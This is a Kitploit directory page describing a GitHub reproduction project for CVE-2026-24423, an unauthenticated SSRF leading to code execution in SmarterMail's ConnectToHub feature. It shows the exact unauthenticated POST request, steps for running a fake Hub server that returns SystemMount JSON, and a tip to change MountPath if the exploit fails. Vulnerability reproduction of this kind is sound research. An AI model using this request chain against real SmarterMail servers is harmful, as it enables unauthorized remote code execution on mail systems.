Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24423 — Reproduction script for CVE-2026-24423, a trust boundary violation in SmarterMail ConnectToHub leading to SSRF and potential remote code execution. Includes a simulated Hub server and instructions for triggering the vulnerable API. | Kitploit
工具/GitHubGitHub/aavamin/cve-2026-24423
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubaavamin/cve-2026-24423

CVE-2026-24423

Reproduction script for CVE-2026-24423, a trust boundary violation in SmarterMail ConnectToHub leading to SSRF and potential remote code execution. Includes a simulated Hub server and instructions for triggering the vulnerable API.

查看仓库
816个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24423

root@kitploit:~
# CVE-2026-24423 – Reproduction

> ⚠️ **仅用于安全研究与授权测试 / For security research and authorized testing only**


## 简介(Overview)

本项目用于复现 **CVE-2026-24423** 漏洞。  
该漏洞存在于 **SmarterMail ConnectToHub** 功能中,其根本原因是:

- 管理级接口未进行身份认证  
- 服务端会主动连接用户指定的 Hub(SSRF)  
- 外部 Hub 返回的数据被直接用于本地系统级操作  

该漏洞属于**设计级信任边界破坏(Trust Boundary Violation)**,最终可能导致远程代码执行。

本仓库仅用于**漏洞验证与技术研究**,不用于武器化利用。

使用方法(Usage)

1️⃣ 启动 Hub 模拟服务

Start Hub Simulation Server

root@kitploit:~
python3 cve-2026-24423.py

该脚本将:

  • 监听 80 端口
  • 模拟 SmarterMail Hub 接口
  • 返回包含 SystemMount 配置的 JSON 响应

2️⃣ 触发漏洞接口

Trigger the Vulnerable API

使用 Yakit 或 发送请求:

Burp Suite
root@kitploit:~
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json

{
  "hubAddress": "http://ip",
  "oneTimePassword": "test",
  "nodeName": "victim"
}

该接口无需身份认证 No authentication is required.


3️⃣ 复现失败处理

Troubleshooting

如果漏洞复现失败:

  • 请修改 cve-2026-24423.py 中的 MountPath 参数

4️⃣ 复现结果

Result

当漏洞触发成功时,SmarterMail 将解析 Hub 返回的数据,默认代码仅执行whoami命令。

示例截图 / Example:

result


致谢(Credit)

本项目由ChatGPT 完成。

下载工具